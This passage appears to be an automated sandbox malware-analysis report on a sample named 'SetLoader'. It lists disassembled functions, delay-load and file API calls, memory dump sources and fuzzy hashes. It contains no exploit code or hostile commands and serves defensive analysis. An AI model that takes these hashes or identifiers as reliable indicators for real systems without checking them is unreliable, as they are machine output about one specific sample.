                                              • ___delayLoadHelper2@8.DELAYIMP ref: 0063068E
                                                • Part of subcall function 00630D3A: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00630DAD
                                                • Part of subcall function 00630D3A: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00630DBE
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2947210862.0000000000611000.00000020.00000001.01000000.00000003.sdmp, Offset: 00610000, based on PE: true
                                              • Associated: 00000000.00000002.2947119940.0000000000610000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947328933.0000000000646000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947702980.0000000000652000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947702980.0000000000659000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947702980.0000000000672000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947702980.0000000000676000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947871076.0000000000677000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_610000_SetLoader.jbxd
                                              Similarity
                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                              • String ID:
                                              • API String ID: 1269201914-0
                                              • Opcode ID: 310c5b0e8cfdda9c602d1719cefca5764b134216d031a4d53a05d5d2166c2d6e
                                              • Instruction ID: 4c9915c8b93282a1947d7b21c01c0cd276fa4d34205b3c971dfd090c67955b5e
                                              • Opcode Fuzzy Hash: 310c5b0e8cfdda9c602d1719cefca5764b134216d031a4d53a05d5d2166c2d6e
                                              • Instruction Fuzzy Hash: 5EA001EA2A9547FC32596295AD27C3F025ED8CAB65B328D6EF40AC4085A881289A50B5
                                              Function 0063070A Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                              Download Yara Rule
                                              APIs
                                              • ___delayLoadHelper2@8.DELAYIMP ref: 0063068E
                                                • Part of subcall function 00630D3A: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00630DAD
                                                • Part of subcall function 00630D3A: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00630DBE
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2947210862.0000000000611000.00000020.00000001.01000000.00000003.sdmp, Offset: 00610000, based on PE: true
                                              • Associated: 00000000.00000002.2947119940.0000000000610000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947328933.0000000000646000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947702980.0000000000652000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947702980.0000000000659000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947702980.0000000000672000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947702980.0000000000676000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947871076.0000000000677000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_610000_SetLoader.jbxd
                                              Similarity
                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                              • String ID:
                                              • API String ID: 1269201914-0
                                              • Opcode ID: f255c0e32885561adfe9cfd0eb22f395ed76b7923619218a2578012392686b4e
                                              • Instruction ID: 4c9915c8b93282a1947d7b21c01c0cd276fa4d34205b3c971dfd090c67955b5e
                                              • Opcode Fuzzy Hash: f255c0e32885561adfe9cfd0eb22f395ed76b7923619218a2578012392686b4e
                                              • Instruction Fuzzy Hash: 5EA001EA2A9547FC32596295AD27C3F025ED8CAB65B328D6EF40AC4085A881289A50B5
                                              Function 00630782 Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                              Download Yara Rule
                                              APIs
                                              • ___delayLoadHelper2@8.DELAYIMP ref: 0063068E
                                                • Part of subcall function 00630D3A: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00630DAD
                                                • Part of subcall function 00630D3A: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00630DBE
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2947210862.0000000000611000.00000020.00000001.01000000.00000003.sdmp, Offset: 00610000, based on PE: true
                                              • Associated: 00000000.00000002.2947119940.0000000000610000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947328933.0000000000646000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947702980.0000000000652000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947702980.0000000000659000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947702980.0000000000672000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947702980.0000000000676000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947871076.0000000000677000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_610000_SetLoader.jbxd
                                              Similarity
                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                              • String ID:
                                              • API String ID: 1269201914-0
                                              • Opcode ID: eb027dc107553e96dd4936476234a3ebcd9a7651e36b595536c921ba8cd36689
                                              • Instruction ID: 4c9915c8b93282a1947d7b21c01c0cd276fa4d34205b3c971dfd090c67955b5e
                                              • Opcode Fuzzy Hash: eb027dc107553e96dd4936476234a3ebcd9a7651e36b595536c921ba8cd36689
                                              • Instruction Fuzzy Hash: 5EA001EA2A9547FC32596295AD27C3F025ED8CAB65B328D6EF40AC4085A881289A50B5
                                              Function 006308E7 Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                              Download Yara Rule
                                              APIs
                                              • ___delayLoadHelper2@8.DELAYIMP ref: 006308A7
                                                • Part of subcall function 00630D3A: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00630DAD
                                                • Part of subcall function 00630D3A: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00630DBE
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2947210862.0000000000611000.00000020.00000001.01000000.00000003.sdmp, Offset: 00610000, based on PE: true
                                              • Associated: 00000000.00000002.2947119940.0000000000610000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947328933.0000000000646000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947702980.0000000000652000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947702980.0000000000659000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947702980.0000000000672000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947702980.0000000000676000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947871076.0000000000677000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_610000_SetLoader.jbxd
                                              Similarity
                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                              • String ID:
                                              • API String ID: 1269201914-0
                                              • Opcode ID: fa0b5aeb9b586271d1b88079048570c3270dfe63f212f7e3b3e2806dcb216566
                                              • Instruction ID: 036e2395bc42d0dad21bb42c16116eb74e2d937c806a83b3fbf22ec8015b1ef7
                                              • Opcode Fuzzy Hash: fa0b5aeb9b586271d1b88079048570c3270dfe63f212f7e3b3e2806dcb216566
                                              • Instruction Fuzzy Hash: 83A001962A9116FC36496295AD26C3A125ED8C8B65B318D6EF51AC4082A890288A50B5
                                              Function 006308F1 Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                              Download Yara Rule
                                              APIs
                                              • ___delayLoadHelper2@8.DELAYIMP ref: 006308A7
                                                • Part of subcall function 00630D3A: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00630DAD
                                                • Part of subcall function 00630D3A: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00630DBE
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2947210862.0000000000611000.00000020.00000001.01000000.00000003.sdmp, Offset: 00610000, based on PE: true
                                              • Associated: 00000000.00000002.2947119940.0000000000610000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947328933.0000000000646000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947702980.0000000000652000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947702980.0000000000659000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947702980.0000000000672000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947702980.0000000000676000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947871076.0000000000677000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_610000_SetLoader.jbxd
                                              Similarity
                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                              • String ID:
                                              • API String ID: 1269201914-0
                                              • Opcode ID: b01e23320ac03632f4c5cc84967313c101b3e2a322f013e85b0d32d0921f8b08
                                              • Instruction ID: 036e2395bc42d0dad21bb42c16116eb74e2d937c806a83b3fbf22ec8015b1ef7
                                              • Opcode Fuzzy Hash: b01e23320ac03632f4c5cc84967313c101b3e2a322f013e85b0d32d0921f8b08
                                              • Instruction Fuzzy Hash: 83A001962A9116FC36496295AD26C3A125ED8C8B65B318D6EF51AC4082A890288A50B5
                                              Function 006308C9 Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                              Download Yara Rule
                                              APIs
                                              • ___delayLoadHelper2@8.DELAYIMP ref: 006308A7
                                                • Part of subcall function 00630D3A: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00630DAD
                                                • Part of subcall function 00630D3A: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00630DBE
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2947210862.0000000000611000.00000020.00000001.01000000.00000003.sdmp, Offset: 00610000, based on PE: true
                                              • Associated: 00000000.00000002.2947119940.0000000000610000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947328933.0000000000646000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947702980.0000000000652000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947702980.0000000000659000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947702980.0000000000672000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947702980.0000000000676000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947871076.0000000000677000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_610000_SetLoader.jbxd
                                              Similarity
                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                              • String ID:
                                              • API String ID: 1269201914-0
                                              • Opcode ID: 0e1ab340b80b15a4b22c00098dda26166e821c56d7d0ffccf09c2c0aef7b9b3d
                                              • Instruction ID: 036e2395bc42d0dad21bb42c16116eb74e2d937c806a83b3fbf22ec8015b1ef7
                                              • Opcode Fuzzy Hash: 0e1ab340b80b15a4b22c00098dda26166e821c56d7d0ffccf09c2c0aef7b9b3d
                                              • Instruction Fuzzy Hash: 83A001962A9116FC36496295AD26C3A125ED8C8B65B318D6EF51AC4082A890288A50B5
                                              Function 006308DD Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                              Download Yara Rule
                                              APIs
                                              • ___delayLoadHelper2@8.DELAYIMP ref: 006308A7
                                                • Part of subcall function 00630D3A: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00630DAD
                                                • Part of subcall function 00630D3A: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00630DBE
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2947210862.0000000000611000.00000020.00000001.01000000.00000003.sdmp, Offset: 00610000, based on PE: true
                                              • Associated: 00000000.00000002.2947119940.0000000000610000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947328933.0000000000646000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947702980.0000000000652000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947702980.0000000000659000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947702980.0000000000672000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947702980.0000000000676000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947871076.0000000000677000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_610000_SetLoader.jbxd
                                              Similarity
                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                              • String ID:
                                              • API String ID: 1269201914-0
                                              • Opcode ID: 25ba863af03c394b5a97f1c9d4935373427c00bda12d30d3299e0754571bdf22
                                              • Instruction ID: 036e2395bc42d0dad21bb42c16116eb74e2d937c806a83b3fbf22ec8015b1ef7
                                              • Opcode Fuzzy Hash: 25ba863af03c394b5a97f1c9d4935373427c00bda12d30d3299e0754571bdf22
                                              • Instruction Fuzzy Hash: 83A001962A9116FC36496295AD26C3A125ED8C8B65B318D6EF51AC4082A890288A50B5
                                              Function 006308B5 Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                              Download Yara Rule
                                              APIs
                                              • ___delayLoadHelper2@8.DELAYIMP ref: 006308A7
                                                • Part of subcall function 00630D3A: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00630DAD
                                                • Part of subcall function 00630D3A: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00630DBE
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2947210862.0000000000611000.00000020.00000001.01000000.00000003.sdmp, Offset: 00610000, based on PE: true
                                              • Associated: 00000000.00000002.2947119940.0000000000610000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947328933.0000000000646000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947702980.0000000000652000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947702980.0000000000659000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947702980.0000000000672000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947702980.0000000000676000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947871076.0000000000677000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_610000_SetLoader.jbxd
                                              Similarity
                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                              • String ID:
                                              • API String ID: 1269201914-0
                                              • Opcode ID: 36b3650132cbceee29633abde502955a9f1cc0640059d3fe4f46a803ab5ffef1
                                              • Instruction ID: 036e2395bc42d0dad21bb42c16116eb74e2d937c806a83b3fbf22ec8015b1ef7
                                              • Opcode Fuzzy Hash: 36b3650132cbceee29633abde502955a9f1cc0640059d3fe4f46a803ab5ffef1
                                              • Instruction Fuzzy Hash: 83A001962A9116FC36496295AD26C3A125ED8C8B65B318D6EF51AC4082A890288A50B5
                                              Function 006308BF Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                              Download Yara Rule
                                              APIs
                                              • ___delayLoadHelper2@8.DELAYIMP ref: 006308A7
                                                • Part of subcall function 00630D3A: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00630DAD
                                                • Part of subcall function 00630D3A: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00630DBE
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2947210862.0000000000611000.00000020.00000001.01000000.00000003.sdmp, Offset: 00610000, based on PE: true
                                              • Associated: 00000000.00000002.2947119940.0000000000610000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947328933.0000000000646000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947702980.0000000000652000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947702980.0000000000659000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947702980.0000000000672000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947702980.0000000000676000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947871076.0000000000677000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_610000_SetLoader.jbxd
                                              Similarity
                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                              • String ID:
                                              • API String ID: 1269201914-0
                                              • Opcode ID: f27168a2567bca7bcce1ad86597c023e32521d50a2d6655c4744b19628231599
                                              • Instruction ID: 036e2395bc42d0dad21bb42c16116eb74e2d937c806a83b3fbf22ec8015b1ef7
                                              • Opcode Fuzzy Hash: f27168a2567bca7bcce1ad86597c023e32521d50a2d6655c4744b19628231599
                                              • Instruction Fuzzy Hash: 83A001962A9116FC36496295AD26C3A125ED8C8B65B318D6EF51AC4082A890288A50B5
                                              Function 0063089A Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                              Download Yara Rule
                                              APIs
                                              • ___delayLoadHelper2@8.DELAYIMP ref: 006308A7
                                                • Part of subcall function 00630D3A: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00630DAD
                                                • Part of subcall function 00630D3A: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00630DBE
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2947210862.0000000000611000.00000020.00000001.01000000.00000003.sdmp, Offset: 00610000, based on PE: true
                                              • Associated: 00000000.00000002.2947119940.0000000000610000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947328933.0000000000646000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947702980.0000000000652000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947702980.0000000000659000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947702980.0000000000672000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947702980.0000000000676000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947871076.0000000000677000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_610000_SetLoader.jbxd
                                              Similarity
                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                              • String ID:
                                              • API String ID: 1269201914-0
                                              • Opcode ID: a47d22b8f3dfb6bc75e11c48c5baccf1f7f43a3dc9caf229dc2e035cf8a63e91
                                              • Instruction ID: a2a4bf2eaebdb78bd7e6917a3df77c2106ddc3858ce8a557b05dbce4ff546ff1
                                              • Opcode Fuzzy Hash: a47d22b8f3dfb6bc75e11c48c5baccf1f7f43a3dc9caf229dc2e035cf8a63e91
                                              • Instruction Fuzzy Hash: 79A001962A9215BC364962A5AD26C3A225ED8C4B25B3189AEF519D4086A890288A50B5
                                              Function 00630A46 Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                              Download Yara Rule
                                              APIs
                                              • ___delayLoadHelper2@8.DELAYIMP ref: 006309FC
                                                • Part of subcall function 00630D3A: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00630DAD
                                                • Part of subcall function 00630D3A: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00630DBE
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2947210862.0000000000611000.00000020.00000001.01000000.00000003.sdmp, Offset: 00610000, based on PE: true
                                              • Associated: 00000000.00000002.2947119940.0000000000610000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947328933.0000000000646000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947702980.0000000000652000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947702980.0000000000659000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947702980.0000000000672000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947702980.0000000000676000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947871076.0000000000677000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_610000_SetLoader.jbxd
                                              Similarity
                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                              • String ID:
                                              • API String ID: 1269201914-0
                                              • Opcode ID: 594dbb2afa4a42be2e394973022a2e6bcbf5b1124cbf2c983357d1e988146c72
                                              • Instruction ID: 8de8849a76919918b2818da4d79a5ab690285acb50b8edc38d33c7f594e7bd54
                                              • Opcode Fuzzy Hash: 594dbb2afa4a42be2e394973022a2e6bcbf5b1124cbf2c983357d1e988146c72
                                              • Instruction Fuzzy Hash: 80A012C139C001FC31051240AD22C36014EC4C4B51730892DF001C0081544018090070
                                              Function 00630A32 Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                              Download Yara Rule
                                              APIs
                                              • ___delayLoadHelper2@8.DELAYIMP ref: 006309FC
                                                • Part of subcall function 00630D3A: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00630DAD
                                                • Part of subcall function 00630D3A: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00630DBE
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2947210862.0000000000611000.00000020.00000001.01000000.00000003.sdmp, Offset: 00610000, based on PE: true
                                              • Associated: 00000000.00000002.2947119940.0000000000610000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947328933.0000000000646000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947702980.0000000000652000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947702980.0000000000659000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947702980.0000000000672000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947702980.0000000000676000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947871076.0000000000677000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_610000_SetLoader.jbxd
                                              Similarity
                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                              • String ID:
                                              • API String ID: 1269201914-0
                                              • Opcode ID: 2dc927add82ddd1c53fb4de25aeea4065570dd2d0ca3c64bd6e47f05ad8ed6cc
                                              • Instruction ID: 8de8849a76919918b2818da4d79a5ab690285acb50b8edc38d33c7f594e7bd54
                                              • Opcode Fuzzy Hash: 2dc927add82ddd1c53fb4de25aeea4065570dd2d0ca3c64bd6e47f05ad8ed6cc
                                              • Instruction Fuzzy Hash: 80A012C139C001FC31051240AD22C36014EC4C4B51730892DF001C0081544018090070
                                              Function 00630A3C Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                              Download Yara Rule
                                              APIs
                                              • ___delayLoadHelper2@8.DELAYIMP ref: 006309FC
                                                • Part of subcall function 00630D3A: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00630DAD
                                                • Part of subcall function 00630D3A: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00630DBE
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2947210862.0000000000611000.00000020.00000001.01000000.00000003.sdmp, Offset: 00610000, based on PE: true
                                              • Associated: 00000000.00000002.2947119940.0000000000610000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947328933.0000000000646000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947702980.0000000000652000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947702980.0000000000659000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947702980.0000000000672000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947702980.0000000000676000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947871076.0000000000677000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_610000_SetLoader.jbxd
                                              Similarity
                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                              • String ID:
                                              • API String ID: 1269201914-0
                                              • Opcode ID: 55267243fb9f09d6d662bc4e571c32d251c4394c4f6b8dcf5f00b292fac91663
                                              • Instruction ID: 8de8849a76919918b2818da4d79a5ab690285acb50b8edc38d33c7f594e7bd54
                                              • Opcode Fuzzy Hash: 55267243fb9f09d6d662bc4e571c32d251c4394c4f6b8dcf5f00b292fac91663
                                              • Instruction Fuzzy Hash: 80A012C139C001FC31051240AD22C36014EC4C4B51730892DF001C0081544018090070
                                              Function 00630A1E Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                              Download Yara Rule
                                              APIs
                                              • ___delayLoadHelper2@8.DELAYIMP ref: 006309FC
                                                • Part of subcall function 00630D3A: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00630DAD
                                                • Part of subcall function 00630D3A: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00630DBE
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2947210862.0000000000611000.00000020.00000001.01000000.00000003.sdmp, Offset: 00610000, based on PE: true
                                              • Associated: 00000000.00000002.2947119940.0000000000610000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947328933.0000000000646000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947702980.0000000000652000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947702980.0000000000659000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947702980.0000000000672000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947702980.0000000000676000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947871076.0000000000677000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_610000_SetLoader.jbxd
                                              Similarity
                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                              • String ID:
                                              • API String ID: 1269201914-0
                                              • Opcode ID: 01dfff51263e623372cd0a5e2b3fc11ca204404ee414ca12dde5f2a4b3345cb0
                                              • Instruction ID: 8de8849a76919918b2818da4d79a5ab690285acb50b8edc38d33c7f594e7bd54
                                              • Opcode Fuzzy Hash: 01dfff51263e623372cd0a5e2b3fc11ca204404ee414ca12dde5f2a4b3345cb0
                                              • Instruction Fuzzy Hash: 80A012C139C001FC31051240AD22C36014EC4C4B51730892DF001C0081544018090070
                                              Function 0061B949 Relevance: 1.5, APIs: 1, Instructions: 7fileCOMMON
                                              Download Yara Rule
                                              APIs
                                              • SetEndOfFile.KERNELBASE(?,0061A712,?,?,?,?,?,?,?), ref: 0061B94C
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2947210862.0000000000611000.00000020.00000001.01000000.00000003.sdmp, Offset: 00610000, based on PE: true
                                              • Associated: 00000000.00000002.2947119940.0000000000610000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947328933.0000000000646000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947702980.0000000000652000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947702980.0000000000659000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947702980.0000000000672000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947702980.0000000000676000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947871076.0000000000677000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_610000_SetLoader.jbxd
                                              Similarity
                                              • API ID: File
                                              • String ID:
                                              • API String ID: 749574446-0
